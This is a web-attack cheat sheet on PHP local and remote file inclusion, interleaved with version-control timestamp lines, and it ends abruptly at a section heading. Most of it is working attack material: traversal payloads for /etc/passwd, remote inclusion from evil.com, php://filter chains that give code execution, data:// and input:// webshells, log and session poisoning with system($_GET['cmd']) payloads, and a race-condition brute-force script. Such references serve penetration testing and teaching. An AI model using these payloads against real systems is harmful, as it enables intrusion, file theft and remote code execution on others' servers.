2018-12-27 23:27:15 +00:00
# File Inclusion
2018-08-12 21:30:22 +00:00
2019-04-21 17:50:50 +00:00
> The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application.
2016-10-20 02:39:06 +00:00
2019-04-21 17:50:50 +00:00
> The Path Traversal vulnerability allows an attacker to access a file, usually exploiting a "reading" mechanism implemented in the target application
2018-12-22 23:45:45 +00:00
2018-07-07 10:04:55 +00:00
## Summary
2018-08-12 21:30:22 +00:00
2022-08-09 09:02:21 +00:00
- [File Inclusion ](#file-inclusion )
- [Summary ](#summary )
- [Tools ](#tools )
- [Basic LFI ](#basic-lfi )
- [Null byte ](#null-byte )
- [Double encoding ](#double-encoding )
- [UTF-8 encoding ](#utf-8-encoding )
- [Path and dot truncation ](#path-and-dot-truncation )
- [Filter bypass tricks ](#filter-bypass-tricks )
- [Basic RFI ](#basic-rfi )
- [Null byte ](#null-byte-1 )
- [Double encoding ](#double-encoding-1 )
- [Bypass allow_url_include ](#bypass-allow_url_include )
- [LFI / RFI using wrappers ](#lfi--rfi-using-wrappers )
- [Wrapper php://filter ](#wrapper-phpfilter )
- [Wrapper data:// ](#wrapper-data )
- [Wrapper expect:// ](#wrapper-expect )
- [Wrapper input:// ](#wrapper-input )
2023-03-27 20:38:25 +00:00
- [Wrapper zip:// ](#wrapper-zip )
2022-08-09 09:02:21 +00:00
- [Wrapper phar:// ](#wrapper-phar )
2023-04-03 08:48:53 +00:00
- [Wrapper convert.iconv:// and dechunk:// ](#wrapper-converticonv-and-dechunk )
2022-08-09 09:02:21 +00:00
- [LFI to RCE via /proc/*/fd ](#lfi-to-rce-via-procfd )
- [LFI to RCE via /proc/self/environ ](#lfi-to-rce-via-procselfenviron )
- [LFI to RCE via upload ](#lfi-to-rce-via-upload )
- [LFI to RCE via upload (race) ](#lfi-to-rce-via-upload-race )
- [LFI to RCE via upload (FindFirstFile) ](#lfi-to-rce-via-upload-findfirstfile )
- [LFI to RCE via phpinfo() ](#lfi-to-rce-via-phpinfo )
- [LFI to RCE via controlled log file ](#lfi-to-rce-via-controlled-log-file )
- [RCE via SSH ](#rce-via-ssh )
- [RCE via Mail ](#rce-via-mail )
- [RCE via Apache logs ](#rce-via-apache-logs )
- [LFI to RCE via PHP sessions ](#lfi-to-rce-via-php-sessions )
- [LFI to RCE via credentials files ](#lfi-to-rce-via-credentials-files )
- [Windows version ](#windows-version )
- [Linux version ](#linux-version )
- [References ](#references )
2018-07-07 10:04:55 +00:00
2019-06-09 16:13:15 +00:00
## Tools
* [Kadimus - https://github.com/P0cL4bs/Kadimus ](https://github.com/P0cL4bs/Kadimus )
2019-06-16 21:45:52 +00:00
* [LFISuite - https://github.com/D35m0nd142/LFISuite ](https://github.com/D35m0nd142/LFISuite )
2019-06-23 22:21:39 +00:00
* [fimap - https://github.com/kurobeats/fimap ](https://github.com/kurobeats/fimap )
2020-12-11 17:52:21 +00:00
* [panoptic - https://github.com/lightos/Panoptic ](https://github.com/lightos/Panoptic )
2019-06-09 16:13:15 +00:00
2017-09-23 22:32:55 +00:00
## Basic LFI
2018-08-12 21:30:22 +00:00
2018-12-27 23:27:15 +00:00
In the following examples we include the `/etc/passwd` file, check the `Directory & Path Traversal` chapter for more interesting files.
2018-08-12 21:30:22 +00:00
```powershell
2017-09-23 22:32:55 +00:00
http://example.com/index.php?page=../../../etc/passwd
2018-07-07 10:04:55 +00:00
```
2017-09-23 22:32:55 +00:00
2019-05-12 19:34:09 +00:00
### Null byte
2018-08-12 21:30:22 +00:00
2019-08-18 20:24:48 +00:00
:warning: In versions of PHP below 5.3.4 we can terminate with null byte.
2019-06-23 22:21:39 +00:00
2018-08-12 21:30:22 +00:00
```powershell
2017-09-23 22:32:55 +00:00
http://example.com/index.php?page=../../../etc/passwd%00
2018-07-07 10:04:55 +00:00
```
2017-09-23 22:32:55 +00:00
2019-05-12 19:34:09 +00:00
### Double encoding
2018-08-12 21:30:22 +00:00
```powershell
2017-09-23 22:32:55 +00:00
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
2018-07-07 10:04:55 +00:00
```
2017-09-23 22:32:55 +00:00
2019-06-29 09:20:17 +00:00
### UTF-8 encoding
```powershell
http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00
```
2019-05-12 20:23:55 +00:00
### Path and dot truncation
2019-05-12 19:34:09 +00:00
On most PHP installations a filename longer than 4096 bytes will be cut off so any excess chars will be thrown away.
2018-08-12 21:30:22 +00:00
```powershell
2019-05-12 20:23:55 +00:00
http://example.com/index.php?page=../../../etc/passwd............[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd\.\.\.\.\.\.[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd/./././././.[ADD MORE]
http://example.com/index.php?page=../../../[ADD MORE]../../../../etc/passwd
2018-07-07 10:04:55 +00:00
```
2017-09-23 22:32:55 +00:00
2019-05-12 19:34:09 +00:00
### Filter bypass tricks
2018-08-12 21:30:22 +00:00
```powershell
2017-09-23 22:32:55 +00:00
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
2018-07-07 10:04:55 +00:00
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
2017-08-15 00:37:09 +00:00
```
2018-07-07 10:04:55 +00:00
## Basic RFI
2018-08-12 21:30:22 +00:00
2019-05-12 20:23:55 +00:00
Most of the filter bypasses from LFI section can be reused for RFI.
2018-08-12 21:30:22 +00:00
```powershell
2017-08-15 00:37:09 +00:00
http://example.com/index.php?page=http://evil.com/shell.txt
2018-07-07 10:04:55 +00:00
```
2019-05-12 19:34:09 +00:00
### Null byte
2018-08-12 21:30:22 +00:00
```powershell
2017-08-15 00:37:09 +00:00
http://example.com/index.php?page=http://evil.com/shell.txt%00
2018-07-07 10:04:55 +00:00
```
2019-05-12 19:34:09 +00:00
### Double encoding
2018-08-12 21:30:22 +00:00
```powershell
2017-08-15 00:37:09 +00:00
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
```
2019-05-12 20:23:55 +00:00
### Bypass allow_url_include
When `allow_url_include` and `allow_url_fopen` are set to `Off` . It is still possible to include a remote file on Windows box using the `smb` protocol.
1. Create a share open to everyone
2. Write a PHP code inside a file : `shell.php`
3. Include it `http://example.com/index.php?page=\\10.0.0.1\share\shell.php`
2018-07-07 10:04:55 +00:00
## LFI / RFI using wrappers
2017-07-02 21:10:34 +00:00
2018-07-07 10:04:55 +00:00
### Wrapper php://filter
2018-08-12 21:30:22 +00:00
2022-10-24 10:05:39 +00:00
The part "`php://filter`" is case insensitive
2018-08-12 21:30:22 +00:00
```powershell
2016-10-24 17:15:10 +00:00
http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
2019-10-17 15:40:59 +00:00
http://example.com/index.php?page=php://filter/convert.iconv.utf-8.utf-16/resource=index.php
2016-10-24 17:15:10 +00:00
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
2017-07-02 21:10:34 +00:00
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
2018-07-07 10:04:55 +00:00
```
2017-07-02 21:10:34 +00:00
2022-08-21 14:38:54 +00:00
Wrappers can be chained with a compression wrapper for large files.
2018-08-12 21:30:22 +00:00
```powershell
2017-07-02 21:10:34 +00:00
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
2016-10-20 02:39:06 +00:00
```
2020-02-20 11:40:30 +00:00
NOTE: Wrappers can be chained multiple times using `|` or `/` :
- Multiple base64 decodes: `php://filter/convert.base64-decoder|convert.base64-decode|convert.base64-decode/resource=%s`
2022-10-24 10:05:39 +00:00
- deflate then `base64encode` (useful for limited character exfil): `php://filter/zlib.deflate/convert.base64-encode/resource=/var/www/html/index.php`
2019-06-09 22:05:47 +00:00
```powershell
./kadimus -u "http://example.com/index.php?page=vuln" -S -f "index.php%00" -O index.php --parameter page
curl "http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php" | base64 -d > index.php
```
2018-11-02 12:50:56 +00:00
2022-10-24 10:05:39 +00:00
Also there is a way to turn the `php://filter` into a full RCE.
2022-08-21 14:38:54 +00:00
2022-10-24 10:05:39 +00:00
* [synacktiv/php_filter_chain_generator ](https://github.com/synacktiv/php_filter_chain_generator ) - A CLI to generate PHP filters chain
```powershell
$ python3 php_filter_chain_generator.py --chain '<?php phpinfo();?> '
[+] The following gadget chain will generate the following code : <?php phpinfo();?> (base64 value: PD9waHAgcGhwaW5mbygpOz8+)
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.iconv.UCS-2.UTF8|convert.iconv.L6.UTF8|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM891.CSUNICODE|convert.iconv.ISO8859-14.ISO6937|convert.iconv.BIG-FIVE.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.CP1163.CSA_T500|convert.iconv.UCS-2.MSCP949|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp
```
* [LFI2RCE.py ](./LFI2RCE.py ) to generate a custom payload.
```powershell
# vulnerable file: index.php
# vulnerable parameter: file
# executed command: id
# executed PHP code: <?=`$_GET[0]`;;?>
curl "127.0.0.1:8000/index.php?0=id& file=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS
```
2022-08-21 14:38:54 +00:00
2018-07-07 10:04:55 +00:00
### Wrapper data://
2018-08-12 21:30:22 +00:00
```powershell
2016-10-20 02:39:06 +00:00
http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
2018-07-07 10:04:55 +00:00
NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?> "
2016-10-20 02:39:06 +00:00
```
2018-08-12 21:30:22 +00:00
Fun fact: you can trigger an XSS and bypass the Chrome Auditor with : `http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+`
2018-07-07 10:04:55 +00:00
2022-08-21 14:38:54 +00:00
2018-07-07 10:04:55 +00:00
### Wrapper expect://
2018-08-12 21:30:22 +00:00
```powershell
2018-09-10 18:40:43 +00:00
http://example.com/index.php?page=expect://id
http://example.com/index.php?page=expect://ls
2017-07-02 21:10:34 +00:00
```
2022-08-21 14:38:54 +00:00
2018-07-07 10:04:55 +00:00
### Wrapper input://
2018-08-12 21:30:22 +00:00
2019-06-09 22:05:47 +00:00
Specify your payload in the POST parameters, this can be done with a simple `curl` command.
```powershell
curl -X POST --data "<?php echo shell_exec('id'); ?> " "https://example.com/index.php?page=php://input%00" -k -v
```
Alternatively, Kadimus has a module to automate this attack.
2018-08-12 21:30:22 +00:00
```powershell
2019-06-09 22:05:47 +00:00
./kadimus -u "https://example.com/index.php?page=php://input%00" -C '<?php echo shell_exec("id"); ?> ' -T input
2016-10-20 02:39:06 +00:00
```
2023-03-27 20:38:25 +00:00
### Wrapper zip://
1. Create an evil payload: `echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;`
2. Zip the file
```python
zip payload.zip payload.php;
mv payload.zip shell.jpg;
rm payload.php
```
3. Upload the archive and access the file using the wrappers: http://example.com/index.php?page=zip://shell.jpg%23payload.php
2022-08-21 14:38:54 +00:00
2018-08-19 16:47:32 +00:00
### Wrapper phar://
Create a phar file with a serialized object in its meta-data.
```php
// create new Phar
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'text');
$phar->setStub('< ?php __HALT_COMPILER(); ? >');
// add object of any class as meta data
class AnyClass {}
$object = new AnyClass;
$object->data = 'rips';
$phar->setMetadata($object);
$phar->stopBuffering();
```
If a file operation is now performed on our existing Phar file via the phar:// wrapper, then its serialized meta data is unserialized. If this application has a class named AnyClass and it has the magic method __destruct() or __wakeup() defined, then those methods are automatically invoked
```php
class AnyClass {
function __destruct() {
echo $this->data;
}
}
// output: rips
include('phar://test.phar');
```
NOTE: The unserialize is triggered for the phar:// wrapper in any file operation, `file_exists` and many more.
2022-08-21 14:38:54 +00:00
2023-04-03 08:48:53 +00:00
### Wrapper convert.iconv:// and dechunk://
2023-03-27 20:38:25 +00:00
2023-04-03 08:48:53 +00:00
- `convert.iconv://` : convert input into another folder (`convert.iconv.utf-16le.utf-8`)
- `dechunk://` : if the string contains no newlines, it will wipe the entire string if and only if
the string starts with A-Fa-f0-9
The goal of this exploitation is to leak the content of a file, one character at a time, based on the [DownUnderCTF ](https://github.com/DownUnderCTF/Challenges_2022_Public/blob/main/web/minimal-php/solve/solution.py ) writeup.
2023-03-27 20:38:25 +00:00
**Requirements**:
- Backend must not use `file_exists` or `is_file` .
- Vulnerable parameter should be in a `POST` request.
- You can't leak more than 135 characters in a GET request due to the size limit
The exploit chain is based on PHP filters: `iconv` and `dechunk` :
1. Use the `iconv` filter with an encoding increasing the data size exponentially to trigger a memory error.
2. Use the `dechunk` filter to determine the first character of the file, based on the previous error.
3. Use the `iconv` filter again with encodings having different bytes ordering to swap remaining characters with the first one.
Exploit using [synacktiv/php_filter_chains_oracle_exploit ](https://github.com/synacktiv/php_filter_chains_oracle_exploit ), the script will use either the `HTTP status code: 500` or the time as an error-based oracle to determine the character.
```ps1
$ python3 filters_chain_oracle_exploit.py --target http://127.0.0.1 --file '/test' --parameter 0
[*] The following URL is targeted : http://127.0.0.1
[*] The following local file is leaked : /test
[*] Running POST requests
[+] File /test leak is finished!
```
2017-08-15 00:37:09 +00:00
## LFI to RCE via /proc/*/fd
2018-08-12 21:30:22 +00:00
2017-08-15 00:37:09 +00:00
1. Upload a lot of shells (for example : 100)
2018-08-12 21:30:22 +00:00
2. Include http://example.com/index.php?page=/proc/$PID/fd/$FD, with $PID = PID of the process (can be bruteforced) and $FD the filedescriptor (can be bruteforced too)
2018-07-07 10:04:55 +00:00
## LFI to RCE via /proc/self/environ
2018-08-12 21:30:22 +00:00
2018-07-07 10:04:55 +00:00
Like a log file, send the payload in the User-Agent, it will be reflected inside the /proc/self/environ file
2018-08-12 21:30:22 +00:00
```powershell
2018-07-07 10:04:55 +00:00
GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
User-Agent: <?=phpinfo(); ?>
```
2017-08-15 00:37:09 +00:00
2022-08-21 14:38:54 +00:00
2018-08-12 21:30:22 +00:00
## LFI to RCE via upload
2017-08-15 00:37:09 +00:00
2018-08-12 21:30:22 +00:00
If you can upload a file, just inject the shell payload in it (e.g : `<?php system($_GET['c']); ?>` ).
2018-07-07 10:04:55 +00:00
2018-08-12 21:30:22 +00:00
```powershell
2017-08-15 00:37:09 +00:00
http://example.com/index.php?page=path/to/uploaded/file.png
```
2018-08-12 21:30:22 +00:00
2018-07-07 10:04:55 +00:00
In order to keep the file readable it is best to inject into the metadata for the pictures/doc/pdf
2017-08-15 00:37:09 +00:00
2022-08-21 14:38:54 +00:00
2018-08-26 13:43:26 +00:00
## LFI to RCE via upload (race)
2018-09-10 18:40:43 +00:00
Worlds Quitest Let's Play"
2018-08-26 13:43:26 +00:00
* Upload a file and trigger a self-inclusion.
* Repeat 1 a shitload of time to:
* increase our odds of winning the race
* increase our guessing odds
* Bruteforce the inclusion of /tmp/[0-9a-zA-Z]{6}
* Enjoy our shell.
```python
import itertools
import requests
import sys
print('[+] Trying to win the race')
f = {'file': open('shell.php', 'rb')}
for _ in range(4096 * 4096):
requests.post('http://target.com/index.php?c=index.php', f)
print('[+] Bruteforcing the inclusion')
for fname in itertools.combinations(string.ascii_letters + string.digits, 6):
url = 'http://target.com/index.php?c=/tmp/php' + fname
r = requests.get(url)
if 'load average' in r.text: # < ?php echo system('uptime');
print('[+] We have got a shell: ' + url)
sys.exit(0)
print('[x] Something went wrong, please try again')
```
2022-06-19 20:48:46 +00:00
## LFI to RCE via upload (FindFirstFile)
:warning: Only works on Windows
`FindFirstFile` allows using masks (`<< ` as `*` and `>` as `?` ) in LFI paths on Windows.
* Upload a file, it should be stored in the temp folder `C:\Windows\Temp\` .
* Include it using `http://site/vuln.php?inc=c:\windows\temp\php<<`
2018-08-26 13:43:26 +00:00
2018-07-07 10:04:55 +00:00
## LFI to RCE via phpinfo()
2018-08-12 21:30:22 +00:00
2019-11-25 22:12:06 +00:00
PHPinfo() displays the content of any variables such as ** $_GET**, ** $_POST** and ** $_FILES**.
> By making multiple upload posts to the PHPInfo script, and carefully controlling the reads, it is possible to retrieve the name of the temporary file and make a request to the LFI script specifying the temporary file name.
2017-09-13 21:55:29 +00:00
Use the script phpInfoLFI.py (also available at https://www.insomniasec.com/downloads/publications/phpinfolfi.py)
2019-11-25 22:12:06 +00:00
Research from https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf
2017-09-23 22:32:55 +00:00
## LFI to RCE via controlled log file
2018-08-12 21:30:22 +00:00
2018-07-07 10:04:55 +00:00
Just append your PHP code into the log file by doing a request to the service (Apache, SSH..) and include the log file.
2018-08-12 21:30:22 +00:00
```powershell
2017-09-23 22:32:55 +00:00
http://example.com/index.php?page=/var/log/apache/access.log
http://example.com/index.php?page=/var/log/apache/error.log
2020-07-06 21:43:47 +00:00
http://example.com/index.php?page=/var/log/apache2/access.log
http://example.com/index.php?page=/var/log/apache2/error.log
2019-05-30 10:01:24 +00:00
http://example.com/index.php?page=/var/log/nginx/access.log
http://example.com/index.php?page=/var/log/nginx/error.log
2017-09-23 22:32:55 +00:00
http://example.com/index.php?page=/var/log/vsftpd.log
http://example.com/index.php?page=/var/log/sshd.log
http://example.com/index.php?page=/var/log/mail
http://example.com/index.php?page=/var/log/httpd/error_log
http://example.com/index.php?page=/usr/local/apache/log/error_log
http://example.com/index.php?page=/usr/local/apache2/log/error_log
```
2019-06-29 17:23:34 +00:00
### RCE via SSH
Try to ssh into the box with a PHP code as username `<?php system($_GET["cmd"]);?>` .
```powershell
ssh <?php system($_GET["cmd"]);?> @10.10.10.10
```
Then include the SSH log files inside the Web Application.
```powershell
http://example.com/index.php?page=/var/log/auth.log& cmd=id
```
2019-06-09 22:05:47 +00:00
### RCE via Mail
First send an email using the open SMTP then include the log file located at `http://example.com/index.php?page=/var/log/mail` .
```powershell
root@kali:~# telnet 10.10.10.10. 25
Trying 10.10.10.10....
Connected to 10.10.10.10..
Escape character is '^]'.
220 straylight ESMTP Postfix (Debian/GNU)
helo ok
250 straylight
mail from: mail@example.com
250 2.1.0 Ok
rcpt to: root
250 2.1.5 Ok
data
354 End data with < CR > < LF > .< CR > < LF >
subject: <?php echo system($_GET["cmd"]); ?>
data2
.
```
In some cases you can also send the email with the `mail` command line.
```powershell
mail -s "<?php system($_GET['cmd']);?> " www-data@10.10.10.10. < /dev/null
```
2021-05-10 09:48:14 +00:00
### RCE via Apache logs
Poison the User-Agent in access logs:
```
$ curl http://example.org/ -A "<?php system( \$_GET['cmd']);?> "
```
Note: The logs will escape double quotes so use single quotes for strings in the PHP payload.
Then request the logs via the LFI and execute your command.
```
$ curl http://example.org/test.php?page=/var/log/apache2/access.log& cmd=id
```
2018-07-07 10:04:55 +00:00
## LFI to RCE via PHP sessions
2018-08-12 21:30:22 +00:00
2017-09-23 22:32:55 +00:00
Check if the website use PHP Session (PHPSESSID)
2018-08-12 21:30:22 +00:00
```javascript
2017-09-23 22:32:55 +00:00
Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly
```
2018-08-12 21:30:22 +00:00
2020-02-18 11:35:22 +00:00
In PHP these sessions are stored into /var/lib/php5/sess_[PHPSESSID] or /var/lib/php/session/sess_[PHPSESSID] files
2018-08-12 21:30:22 +00:00
```javascript
2017-09-23 22:32:55 +00:00
/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27.
user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";
```
2018-08-12 21:30:22 +00:00
Set the cookie to `<?php system('cat /etc/passwd');?>`
```powershell
2017-09-23 22:32:55 +00:00
login=1& user=<?php system("cat /etc/passwd");?> & pass=password& lang=en_us.php
```
2018-08-12 21:30:22 +00:00
2017-09-23 22:32:55 +00:00
Use the LFI to include the PHP session file
2018-08-12 21:30:22 +00:00
```powershell
2017-09-23 22:32:55 +00:00
login=1& user=admin& pass=password& lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27
```
2019-06-09 22:05:47 +00:00
## LFI to RCE via credentials files
